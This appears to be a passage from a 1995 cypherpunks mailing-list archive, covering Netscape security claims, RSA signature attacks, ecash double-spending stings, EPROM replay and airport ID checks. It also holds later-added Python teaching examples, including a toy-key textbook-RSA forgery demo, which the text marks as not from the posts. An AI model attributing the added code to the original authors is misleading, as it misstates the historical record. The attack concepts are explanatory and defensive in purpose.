are 3.7 bits worth. It goes up as the log.

Before you bet your enterprise on this scheme consider that the math
was done at 03:30 AM.
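
Added example (not code from the post): it evaluates the entropy sum above for a Poisson count with mean x, where the Scheme `en` calls `(p x n)` with the summation index in the mean's position, so its figures differ from the ones computed here (about 1.88 bits at a mean of 1 and 3.70 at a mean of 10). It also computes the parity bias raised in the quoted question and applies the concatenate, hash and truncate rule; SHA-256 stands in for MD5, and the function names, the 4-byte count encoding and the sample counts are assumptions.

```python
import hashlib
import math


def poisson_pmf(mean, k):
    """P(count == k) = mean^k * exp(-mean) / k!, computed in logs to avoid overflow."""
    return math.exp(k * math.log(mean) - mean - math.lgamma(k + 1))


def _support(mean):
    # Range of counts whose neglected tail is far below double precision.
    return range(int(mean + 12 * math.sqrt(mean) + 30))


def shannon_entropy_bits(mean):
    """-sum_K P(K) log2 P(K): the entropy sum written out in the post."""
    total = 0.0
    for k in _support(mean):
        p = poisson_pmf(mean, k)
        if p > 0.0:
            total -= p * math.log2(p)
    return total


def min_entropy_bits(mean):
    """-log2 of the most likely count: the conservative figure for key material."""
    return -math.log2(max(poisson_pmf(mean, k) for k in _support(mean)))


def parity_bias(mean):
    """P(even count) - P(odd count), which works out to exp(-2 * mean)."""
    return sum((-1) ** k * poisson_pmf(mean, k) for k in _support(mean))


def extract_bits(counts, mean, entropy_per_count=shannon_entropy_bits):
    """Concatenate counts, hash them, keep floor(total entropy) bits.

    Returns (value, nbits). SHA-256 is a stand-in for the MD5 named in the
    post; each count is encoded as 4 big-endian bytes so the concatenation
    is unambiguous.
    """
    nbits = min(256, math.floor(len(counts) * entropy_per_count(mean)))
    if nbits < 1:
        raise ValueError("not enough entropy collected for even one bit")
    blob = b"".join(c.to_bytes(4, "big") for c in counts)
    digest = int.from_bytes(hashlib.sha256(blob).digest(), "big")
    return digest >> (256 - nbits), nbits


# Constructed sample: eight interval counts from a source averaging 10 per interval.
SAMPLE_COUNTS = [9, 12, 7, 10, 11, 8, 14, 10]

if __name__ == "__main__":
    for mean in (1, 3, 10, 15):
        print(mean, round(shannon_entropy_bits(mean), 3),
              round(min_entropy_bits(mean), 3), parity_bias(mean))
    print(extract_bits(SAMPLE_COUNTS, 10))
```

Passing `min_entropy_bits` as `entropy_per_count` keeps fewer output bits for the same counts than the Shannon figure does.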






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 19 Oct 95 02:46:37 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <3085EB9F.5C18@netscape.com>
Message-ID: <9510190913.AA01502@all.net>
MIME-Version: 1.0
Content-Type: text


> > The point is, Netscape CLAIMS to provide security - Microsoft doesn't.
> 
>   Here is a quote from Microsoft's Internet Explorer 2.0 Beta announcement,
> which can be found at http://www.microsoft.com/windows/pr/sept2895.htm:
> 
> 
>     Internet Explorer 2.0 also provides users with a secure environment.
>     Complete support for Secure Sockets Layer (SSL) and RSA encryption
>     allows integration with secure sites. In addition, Internet
>     Explorer 2.0 will support Private Communication Technology (PCT),
>     which is an efficient and secure upgrade to the SSL protocol.
>     Internet Explorer will also support Secure Transaction Technology
>     (STT), an electronic payment technology jointly developed by
>     Microsoft and Visa International, as soon as it is available. 
> 
>   There is that pesky word "secure", five times in one paragraph.

I hadn't seen it - everything I said about Netscape (except the money)
applies doubly so to Microsoft - doubly because they have been putting
garbage out for years and should have fixed it long ago.

> > >
> > > A stupid example:
> > > I can replace copy on your machine so that it does a delete instead.
> > > Does that mean that the OS manufacturer has to warn a user about this?
> > 
> > On my machine, if you replace copy with delete, it will be detected
> > before it does the delete, and, unless you are very skilled, when I tell
> > it to copy, the corruption will be automatically corrected.  This is
> > because I use an "integrity shell" - something you guys at Netscape
> > probably never heard of.
> 
>   What if they replace your "integrity shell"?

If you really want to know how this works, you might try reading the 5+
refereed journal articles on the subject, however, to replace the
Integrity shell undetected, you would have to bypass the hardware write
protection on a hard-disk.

> > > There's a point at which one has to hand off the assessment to the buyer.
> > 
> > The point I have been trying to make that many on this list seem to ignore
> > again and again, is that Netscape makes the security claims.  If you don't
> > provide effective protection, don't make the claim.  If you want to make
> > the claim back it up with something other than media hype.
> 
>   We are working on clarifying our security claims.  Here is an
> example from the San Jose Mercury news on Aug. 17, 1995:
> 
>     "We have said for a long time that given the right amount of
>     computer power, that a 40-bit key encrypted message could be
>     decrypted," said Mike Homer, Netscape's vice president of marketing. 

"We" - I take it you are now speaking officially for Netscape?  So how come
Netscape doesn't even know how about Integrity shells and yet claims to
be able to design secure systems for money transfers?

> > > This is my own opinion and also that of anyone who agrees with me.
> > > I'm reading this group because it's very interesting for me personally.
> > > There.
> > 
> > All of our opinions are our own, and my opinion is that Netscape (not you) is:
> > 
> >         - making inadequately supported claims about a nebulous
> >         thing called "security".
> 
>   Here is one definition of the word "security" from the Webster's
> New World Dictionary, Third Edition:
> 
>     protection or defense against attack, espionage, etc.
> 
>   Note that I make no claims that this is Netscape's definition of
> security in our products.

So what IS Netscape's definition?

> >         - using it as a basis to get people to invest millions (billions?)
> >         of dollars.
> 
>   Billions of dollars have not been invested in Netscape.  An examination
> of the prospectus and the current stock price will bear this out.

That's why the ?

>   Here is a quote from the Netscape prospectus:
> 
>     The Company has included in its products an implementation of the
>     Secure Sockets Layer ("SSL"), a security protocol which operates in
>     conjunction with encryption and authentication technology licensed
>     from RSA Data Security, Inc. ("RSA").  Despite the existence of
>     these technologies, the Company's products may be vulnerable to
>     break-ins and similar disruptive problems caused by Internet users.
>     Such computer break-ins and other disruptions would jeopardize the
>     security of information stored in and transmitted through the
>     computer systems of end users of the Company's products...

Excellent - I appreciate the information and withdraw my aspersions relating
to fraud.

>   Of course anyone who is interested in investing in Netscape's
> stock should get and read the entire prospectus.

Absolutely.

> >         - plans to use it to move millions, and eventually billions of
> >         dollars over the Internet, potentially placing a fair chunk of the
> >         world economy (I'm not kidding) as well as individual privacy
> >         (and thus freedom) at risk.
> 
>   It would have to be many billions of dollars before it becomes
> "a fair chunk of the world economy", and I think that even the
> most optimistic projections of internet commerce put that many
> years in the future.

You must be unaware of Chaos theory.  Even a few hundred million screwed
up in the right way can have a major impact on the global economy. It has
something to do with the fact that economies work on the basis of people's
perceptions, not just facts.

> >         - may succeed unless people who do understand the implications
> >         find a way to fix the thing.
> > 
> > These things concern me, so I will stand my ground regardless of the
> > flames and ask, yet again, for someone at Netscape to tell us what you
> > mean by "security" when you make claims about it (I won't repost my
> > questions from a few days ago since you have already ignored them) and
> > why your claims are strong enough for a big chunk of the world economy
> > to rest on it.
> 
>   I don't think that it is reasonable to expect that everyone who
> asks for an official company position on some random mailing list
> will get a response.  The people who make such statements are not
> usually on such lists, and they have other forums for making public
> statements.  Perhaps you should call our PR department for a statement.
> 
>   You are certainly free to "stand your ground", but I am also
> free to not respond to you.

It's a deal.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 02:25:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: airport security
In-Reply-To: <Pine.SUN.3.91.951015172125.14647F-100000@panix.com>
Message-ID: <199510190925.FAA08847@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


DCF writes:
[re: showing picture ID to board commercial flights in the U.S.]
> I wonder how many have challenged this.  

During the California-wide Unabomber scare a few months back (before the LAX-
specific scare), someone on the list said they planned to test it at SJC. I 
think it was Dana Orfeo. The trip report has never surfaced, though. 

(Dana ?  Are you there ?)

> I don't see that ID has anything to do with attack threats in any case.  

Neither do I. 

I've seen several articles on the new FAA "security" measures, none of which
offers any explanation from anyone as to why ID checks make anything more
secure.

Any pointers to news articles or govt. press releases that actually state
some rationale for the ID checks, however spurious ?

> I suppose they are trying to discourage people from buying tickets in 
> false names so that the databanks can be more useful to the authorities.

It's bad enough that it is "illegal" (at least according to some recent ARC 
flight coupons of mine) to sell or otherwise transfer your tickets to someone
else. I'd love to see them try to justify crap like that.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 02:30:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510190848.BAA13416@orac.engr.sgi.com>
Message-ID: <199510190930.FAA00549@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein writes:
> A simple addition to the remailer protocol would be
> to encrypt the message and the control information separately.  This
> would allow the sender of a message to provide a pre-packaged method for
> returning a reply.  The recipient of the original message could then
> just blindly send his reply to the starting point remailer specified in
> the original message by tacking the pre-packaged routing information on
> to the front of his message.

Congratulations, you have reinvented what we usually call "reply blocks". 
See the archives and some remailer help files & web pages.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 03:41:46 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: MKE Threat Assessments
Message-ID: <199510191041.GAA07430@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[quotes pulled out of context, sorry]
> I also strongly believe that you gravely overestimate the threat of MKE, 

I like to think of MKE in terms of a scenario like the Watergate break-in.
Imagine that Haldeman and Dean pull the right strings to get Liddy the 
escrowed keys used by the Democratic National Cmte. to encrypt their campaign
plans. 

George Bush's favorite millstone, J. Danforth Quayle, seemed to do a
pretty good job of manipulating the legal system when it looked like Brett
Kimberlin wanted to chat with the media about his pot customers. I believe
this sort of abuse is a significant threat.

> [and] probably overestimate the interest LEAs have in your personal affairs, 

Ordinarily, I'd say you're right (speaking only for myself). But I suspect
that my active contributions to this list may have put my name in somebody's
Oracle database. (I certainly underestimated the LEAs' interest in Leonard 
Bernstein's personal affairs.) What a waste of time and tax dollars !

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Thu, 19 Oct 95 04:17:28 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <951019071622.2000cf@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



 Futplex writes:
>DCF writes:
>[re: showing picture ID to board commercial flights in the U.S.]
>> I wonder how many have challenged this.  

>Any pointers to news articles or govt. press releases that actually state
>some rationale for the ID checks, however spurious ?

>> I suppose they are trying to discourage people from buying tickets in 
>> false names so that the databanks can be more useful to the authorities.

>It's bad enough that it is "illegal" (at least according to some recent ARC 
>flight coupons of mine) to sell or otherwise transfer your tickets to someone
>else. I'd love to see them try to justify crap like that.

   Without actually agreeing with the FAA, the reason you can't have a name
   other than your own on your ticket, as well as why you are required to
   be in your assigned seat on take-off and landing is because if there is 
   a plane crash, they need to be able to identify an otherwise difficult
   to identify body. This does have some relevance to airport security if
   a plane is blown up.

                                 Sorry about this,
                                      Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 19 Oct 95 07:28:13 PDT
To: cypherpunks@toad.com
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <9510190043.AA11578@all.net>
Message-ID: <199510191427.HAA10783@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) writes:
>3 - I would have figured at least one of you would have looked up the
>chosen plaintext attack and told me why Netscape keys can't be gotten
>at this way.  I think there's an off chance I could win a grand!

I had missed this in your original posting.  Here it is again:

> Concept 3 - There is a chosen plaintext attack against the RSA (published
> in the 1980s in a Crypto conference (IACR?).
> 
>         Attack 50 - Use your Hot Java capability to sign selected
>         message after message till the attacker derives your private key.
>        I think this takes one or two messages per bit of private key.

Chosen plaintext attacks against RSA don't work in the context of RSA
signatures, because the input to the RSA algorithm is a hash of the
message being signed.  You can't control the hash the way you need to to
implement a chosen plaintext attack.  (You can't "choose" the hash.)

For example, one kind of chosen plaintext attack would be to get an RSA
signature on 2, on 3, on 5, on 7, and so on, on all the primes.  This
would let you create an RSA signature on any number by factoring the
number and multiplying the RSA signatures of its prime factors.  But
there is no way to do this in practice because as RSA-based signatures
are actually implemented only hashes are signed.  This is done exactly to
prevent this and similar attacks.

Hal
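
The multiplication trick described above and the reason hashing stops it, as an added example (not code from the post): textbook RSA signatures on 2, 3, 5 and 7 combine into a valid signature on 1260, while the same product of hash-then-sign signatures fails to verify. The key is a constructed toy built from two Mersenne primes, and all function names are assumptions.

```python
import hashlib

# Constructed toy key built from two Mersenne primes: fine for showing the
# arithmetic, useless for security.
P, Q = (1 << 107) - 1, (1 << 127) - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent (needs Python 3.8+)


def raw_sign(m):
    """Textbook RSA: the signer exponentiates whatever integer it is handed."""
    return pow(m, D, N)


def raw_verify(m, sig):
    return pow(sig, E, N) == m % N


def digest_int(message):
    """SHA-256 reduced mod N; real schemes also pad (PKCS#1 v1.5, PSS)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def hashed_sign(message):
    return raw_sign(digest_int(message))


def hashed_verify(message, sig):
    return pow(sig, E, N) == digest_int(message)


def combine_raw(target, prime_sigs):
    """Build a raw signature on `target` from raw signatures on small primes.

    Works because (a*b)^D = a^D * b^D mod N. Returns None when `target` has a
    prime factor that is not among the signed primes.
    """
    if target < 1:
        return None
    sig, rest = 1, target
    for prime, prime_sig in prime_sigs.items():
        while rest % prime == 0:
            rest //= prime
            sig = sig * prime_sig % N
    return sig if rest == 1 else None


# Signatures a raw-signing service would hand out on 2, 3, 5 and 7.
PRIME_SIGS = {p: raw_sign(p) for p in (2, 3, 5, 7)}


def hashed_product_check():
    """Same multiplication against hash-then-sign: sig("2") * sig("3") for "6"."""
    product = hashed_sign(b"2") * hashed_sign(b"3") % N
    return hashed_verify(b"6", product)


if __name__ == "__main__":
    combined = combine_raw(1260, PRIME_SIGS)        # 1260 = 2^2 * 3^2 * 5 * 7
    print("combined raw signature verifies:", raw_verify(1260, combined))
    print("product of hashed signatures verifies:", hashed_product_check())
```

The product of the two hashed signatures is a valid raw signature on H("2")*H("3") mod N, but no message is known to hash to that value, which is the "you can't choose the hash" point.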




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 19 Oct 95 07:31:16 PDT
To: cypherpunks@toad.com
Subject: Re: STT - useable in real life ?
In-Reply-To: <199510191347.XAA17540@oznet02.ozemail.com.au>
Message-ID: <199510191430.HAA11213@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


lyalc@ozemail.com.au (lyal collins) writes:

>From reading the STT specs, a 'credential' is made up of typically 4
>certificates - root, country CA, issuer CA, and cardholder/merchant.
>Two certificates are based upon 1024 bit public keys, 1 (root) is 2048
>while the cardholder PK is 512/768 bit.
>I believe a decrypt operation is required to verify each certificate.

Usually, decrypt operations are needed to ISSUE certificates but not to
verify them.  Verification is equivalent to an encrypt operation using a
small exponent, and may be roughly about 100 times faster than a decrypt.

Hal
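
Where the speed gap comes from, as an added example (not code from the post): an instrumented square-and-multiply counts the modular multiplications for the small public exponents 3 and 65537 against a 1024-bit private exponent. The exponent and modulus are constructed stand-ins rather than a real key, the function names are assumptions, and CRT speed-ups for the private operation are not modelled.

```python
import hashlib


def counted_modexp(base, exponent, modulus):
    """Left-to-right square-and-multiply; returns (result, squarings, multiplies)."""
    if exponent < 1:
        raise ValueError("exponent must be positive")
    result = base % modulus
    squarings = multiplies = 0
    for bit in bin(exponent)[3:]:          # skip '0b' and the leading 1 bit
        result = result * result % modulus
        squarings += 1
        if bit == "1":
            result = result * base % modulus
            multiplies += 1
    return result, squarings, multiplies


def constructed_odd(bits, label):
    """Deterministic odd number with exactly `bits` bits (constructed test value)."""
    blocks = (bits + 255) // 256
    stream = b"".join(hashlib.sha256(label + bytes([i])).digest() for i in range(blocks))
    value = int.from_bytes(stream, "big") >> (len(stream) * 8 - bits)
    return value | (1 << (bits - 1)) | 1


# Constructed stand-ins: the operation count depends only on the exponent's bits.
MODULUS = constructed_odd(1024, b"modulus")
PRIVATE_EXPONENT = constructed_odd(1024, b"private exponent")


def modexp_cost(exponent, modulus=MODULUS, base=0x1234567):
    """Total modular multiplications, after checking the result against pow()."""
    result, squarings, multiplies = counted_modexp(base, exponent, modulus)
    if result != pow(base, exponent, modulus):
        raise AssertionError("square-and-multiply disagrees with pow()")
    return squarings + multiplies


def private_to_public_ratio(public_exponent=65537):
    """How many times more multiplications the private operation needs."""
    return modexp_cost(PRIVATE_EXPONENT) / modexp_cost(public_exponent)


if __name__ == "__main__":
    for e in (3, 65537):
        print("e =", e, "multiplications:", modexp_cost(e),
              "ratio:", round(private_to_public_ratio(e)))
```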




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip R. Moyer <prm@rome.isl.sri.com>
Date: Thu, 19 Oct 95 07:41:40 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
In-Reply-To: <199510190925.FAA08847@opine.cs.umass.edu>
Message-ID: <9510191441.AA01000@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> > I don't see that ID has anything to do with attack threats in any case.  
> Neither do I. 

> -Futplex <futplex@pseudonym.com>

Just a few data points, for anyone who cares.  I've been through security
at San Jose, LaGuardia, O'hare, Saint Louis, and Dallas in the past two
months.  I have _never_ been asked for ID.  Just a valid ticket and, at
checkin, the usual "Did you pack these yourself?  Have you been in possession
of your luggage at all times?" questions.

Cheers,
Phil

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIZlD8T6R9aMgmQ9AQGLxAQAxT8rbDhN7FoltKD8CCq2wHsywpGkhK8z
gp5qd3mXvfkf5DB/dxbSm9ZTkjWwSrwc2nmy3BMXVPmJwyvahSZ6vJEwVRif/2f0
UJ0id+ZpMLlAn91Sk8QjnOLx5iif7OFY39L7NQPFU/TTGveleIbXxQ2Ko5a3P+t4
7if0iCNRRmc=
=FHgX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pdlamb@iquest.com (Patrick Lamb)
Date: Thu, 19 Oct 95 07:40:27 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: [NOISE] Re: Postscript in Netscape
Message-ID: <199510191439.JAA05986@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) wrote:

>> > The point I have been trying to make that many on this list seem to ignore
>> > again and again, is that Netscape makes the security claims.  If you don't
>> > provide effective protection, don't make the claim.  If you want to make
>> > the claim back it up with something other than media hype.
>> 
>>   We are working on clarifying our security claims.  Here is an
>> example from the San Jose Mercury news on Aug. 17, 1995:
>> 
>>     "We have said for a long time that given the right amount of
>>     computer power, that a 40-bit key encrypted message could be
>>     decrypted," said Mike Homer, Netscape's vice president of marketing. 
>
> "We" - I take it you are now speaking officially for Netscape?  So how come
> Netscape doesn't even know how about Integrity shells and yet claims to
> be able to design secure systems for money transfers?

<flame=on>

Give it a rest, Doc.  You give all the rest of us Ph.D.'s a bad rep with
this crap.  Of course, if you went to that 4-year vocational school to get
an M.D., I guess that's understandable.

If you are so illiterate that you can't read the ascription (it says right
up there, "said Mike Homer, Netscape's vice president of marketing"), then
why do you (a) waste bandwidth and our time to go through this drivel, and
(b) flame one Netscape employee for not knowing everything you know?  If
there are all of 5+ refereed publications in this area, how about giving
references?  It would take up less space than your recurring venom eruption!
Or couldn't you understand the papers, given that you couldn't understand
the news clip...

<flame=off>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Thu, 19 Oct 95 06:49:05 PDT
To: die@die.com
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
In-Reply-To: <9510190432.AA04434@pig.die.com>
Message-ID: <199510191346.JAA10841@colon.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


 > 	Perhaps someone with more semiconductor physics background
 > can correct me, but my understanding is that some kinds of nuclear
 > radiation can be used to erase OTP EPROMS.   I suppose this might damage
 > the crystal lattice badly enough to render the device useless in
 > some bit positions or reduce data retention time a lot, but I sure
 > wouldn't bet any security on devices out there not being 
 > arbitrarily reprogrammable (thus using bits to represent digital
 > coins in a wallet that get reset when they are spent is not a
 > good idea).

You might want to take a look at the paper I mentioned, then: I
believe that irradiation of the OTP EPROM to return all bits to "ones"
is too blunt a tool to do you any good. A virgin EPROM has a value of
zero in the suggested scheme. And, as mentioned, flipping random sets
of bits is strongly likely to get you caught.

Note also that the encoding is strongly tied to the laser-etched serial
number on the chip, so replay attacks between two different chips --
i.e. copying a fully loaded chip to a virgin chip -- won't work.

However, it does open up the scheme to replay attacks, if you can load
the chip with value, spend it, irradiate it, and then successfully
reprogram the chip with the exact same values you recorded.

Good point.

I seem to remember PROMs actually undergoing physical, rather than
electrical, state changes (that were presumably nonreversible). Am I
recalling old technology, or am I just plain mistaken?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chip@communities.com (Chip Morningstar)
Date: Thu, 19 Oct 95 09:55:15 PDT
To: cypherpunks@toad.com
Subject: Re: 50 attacks... [NOISE]
Message-ID: <9510191659.AA24317@ communities.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, I just noticed his email address:

> fc@all.net (Dr. Frederick B. Cohen) writes:
> etc.

Sorta makes ya think, huh?

--
-------------------------------------------------------------------------------
| Chip Morningstar                     |                                      |
| Electric Communities                 | "I'm old enough to be living in      |
| 280 2nd Street, Los Altos, CA 94022  |  the future I was warned about."     |
| 415-917-5640                         |         -- Myron Krueger             |
| chip@communities.com                 |                                      |
-------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 19 Oct 95 10:23:54 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510191722.KAA06757@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> :I've deleted the rest of your content-free rant.  Instead of alluding to
> :some "flawed algorithm", why not tell us about the hole you say you've
> :found in netscape?

OK, Netscape functions by DESIGN as an enhanced delivery vehicle.

Is that a sufficient explanation of the hole?? or is more detail necessary
(which follows): 

     Netscape blindly trusts any and all ports on all servers.  On the 
     basis of this trust, it begins a negotiation with a server that 
     might well have a dynamic deliverability capability.  The client then 
     examines a Content-type header, trusts the content-type to decide 
     what application it should launch, and then launches and processes 
     the data block it is fed, all on good faith.

     It even trusts the server to redirect it to any arbitrary destination
     which it automatically loads and then executes.

Is this enough of an explanation??  Or should I paraphrase:

      Netscape is a gateway that permits an untrustworthy server to take 
      complete control of a client's machine.  The server can tell the 
      client where it should go, what it should load and how often, and
      what applications to execute on the client machine, as though this 
      arbitrary server were its master.

Does this help to underscore the problem??  

The Netscape Navigator client was DESIGNED to be controlled remotely from
any machine on the Internet.  This is the "flawed algorithm".  W3 was
meant to be hypertext ... not a gateway that permits a server to deliver
customized byte bombs down a clearcut path by remote-control. 

If people don't know that you don't let another person (or machine) take
control of your machine and run programs on it ... well, like I said in
the past. 

>   "Let me make this absolutely clear.
>
>   It should not be up to non-US citizens like myself to safe-guard US
>   economic security, and protect vital national interests.  It is not 
>   my job and certainly not my responsibility to protect the international
>   public and Fortune 500 companies from poor security."

So without giving out another "exploitation algorithm" to the Internet,
without extending a helping hand to Japan to retaliate against the US for
the American Japanese auto surveillance, I will simply quote from two
sources which are "public record" and mentioned in the FAQ. 

From the "Orange Book", one of the volumes of the Department of Defence's
"Rainbow Series" more commonly known as TCSEC (Trusted Computer System
Evaluation Criteria) and available from: 

 U.S. Government Printing Office         INFOSEC Awareness Office
 Superintendent of Documents     - or -  National Computer Security Centre
 Washington, DC 20402	                 9800 Savage Road	
                                         Fort George G. Meade, MD  20755-6000

which stipulates that:

      "... it is required that ADP (Automated Data Processing) systems
       that "process, store, or use classified data and produce 
       classified information will, with reasonable dependability, prevent:

        a. Deliberate or inadvertent access to classified material by
           unauthorized persons, and

        b. Unauthorized manipulation of the computer and its associated 
           peripheral devices."

The above quoted reference is public information.  And, since Netscape is
making "no-comment" I will quote Netscape's public information. 

>   NETSCAPE CLIENT APIS (NCAPIS) 2.0
>          The NCAPIs are designed to allow third-party applications to
>          remotely control the Netscape Navigator client. They are
>          platform specific, utilizing the platform's native method of
>          interprocess communication (IPC). These APIs are not final
>          and may change with the release of version 1.1 of Netscape
>          Navigator (they do not work with Netscape Navigator 1.0).

Herein is the "flawed algorithm" which is just a fancy way of saying that
it's a flawed idea.  And this isn't new ... it's been there for a long
time. 

Generally, we don't routinely trust every other computer, foreign or 
domestic on the Internet to manipulate us by remote control.  This is
as basic as the idea that we don't give out our PIN numbers with our 
banking cards to anyone who asks us.  

If someone tries to suggest differently, then they are a fool.

Let's recall that Version 1.1 of Navigator was released long ago, and
trusts every machine on the Internet to do just that.  It trusts every
other machine on the Internet to be "trustworthy".  Whether that machine
is foreign or domestic.  We are not speaking about the new and improved --
feature added -- "beta" 2.0 software, we are speaking of the software that
AT&T is using internally and is selling to its customers as we speak as a 
"co-branded" product.

Software which AT&T security "approved" of in direct contravention of the
most basic of basic security principles.

Let me reiterate this.

Netscape's current existing software was designed in direct contravention
of the US Department of Defence's evaluation criteria for Trusted Computer
Systems, the TCSEC.  It also contravenes the ITSEC (Information Technology
Security Evaluation Criteria) which is a document developed by the
British, German, French, and Netherlands governments.

(Anyone can get a free copy of ITSEC by writing to the Commission of the
European Communities in Brussels.)

Netscape forgot one thing about trust.  If you "trust everyone" ... even if
you always trust everyone, you always cut the cards.

And when you're playing poker at these stakes ... well ... 'nuff said.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.  Please don't shoot the messenger.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S If this is confusing to anyone, please direct your comments to
      one or all of the following newsgroups:

                   alt.2600
                   alt.security
                   comp.security.announce
                   comp.security.misc
                   comp.virus





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 19 Oct 95 10:42:29 PDT
To: cypherpunks@toad.com
Subject: Re: digital cash and identity disclosure
In-Reply-To: <m0t5ej6-0002ebC@horten>
Message-ID: <199510191741.KAA09854@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Andreas Bogk <andreas@artcom.de> writes:

>In the Cyphernomicon, section 12.6.6, Tim May writes:

>             - Chaum went to great lengths to develop systems which
>                preserve anonymity for single-spending instances, but
>                which break anonymity and thus reveal identity for double-
>                spending instances. I'm not sure what market forces
>                caused him to think about this as being so important, but
>                it creates many headaches. Besides being clumsy, it
>                requires physical ID, it invokes a legal system to try to
>                collect from "double spenders," and it admits the
>                extremely serious breach of privacy by enabling stings.
>                For example, Alice pays Bob a unit of money, then quickly
>                Alice spends that money before Bob can...Bob is then
>                revealed as a "double spender," and his identity revealed
>                to whomever wanted it...Alice, IRS, Gestapo, etc. A very
>                broken idea. Acceptable mainly for small transactions.

>But as far as I got Chaum's idea, Alice would not reveal Bob's identity,
>but rather her own. Am I missing a point here?

There is an attack here, but the text doesn't go into detail about it.
You have to assume that (as with the current ecash implementation from
Digicash) people have non-anonymous accounts with the bank.  If Alice
wants to know Bob's identity she can collude with the bank to find
out.  As Tim describes, she gives Bob some money, then quickly deposits
the coins herself.  In effect, she intentionally double-spends (with
the bank's permission).  When Bob makes his deposit, his coins are
recognized as matching those which Alice double-spent.  So if Alice
was, say, an agent involved in a government "sting", and bought bootleg
software from Bob, his identity can in fact be learned when he deposits
the money.

Actually with the DigiCash system and in fact all of the ecash systems I
know about, you don't have to get so fancy; Alice can simply give the
bank a record of her transaction with Bob (the coins she sent him) and
these will be recognized when Bob deposits them.

Lucky Green has been discussing ways in which people could exchange coins
anonymously even with DigiCash's ecash in order to provide some immunity
from such attacks.

Hal



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 19 Oct 95 10:44:55 PDT
To: cypherpunks@toad.com
Subject: Re: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
In-Reply-To: <9510190245.AA20897@toad.com>
Message-ID: <4662pt$pcn@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9510190245.AA20897@toad.com>, John Gilmore  <gnu@toad.com> wrote:
>Last reminder!  Come to the Federal Building in SF this Friday at
>10:15AM, go upstairs to Judge Marilyn Hall Patel's courtroom, and Be
>There for the first skirmish in the trial of crypto export controls.
>450 Golden Gate Avenue in downtown SF, two blocks from Van Ness.
>
>We've gotten a lot of press interest.  Both the legal-newspapers in
>SF, the Examiner, and many others will be covering it.  Some of them
>breathlessly asked, "Will the cypherpunks hold a demonstration?", but
>what we will demonstrate is how the legal system can turn against the
>bureaucrats and authoritarians who currently hold crypto hostage.
>
>This will be a low-key meeting, quietly bearing witness, at least
>before we adjourn to a probably rowdy lunch at Max's Opera Cafe at Van
>Ness and Golden Gate Avenues.  If you can't come to the hearing, at
>least come for lunch!
>
>And don't forget, it's a costume party: Dress like a banker.  Even
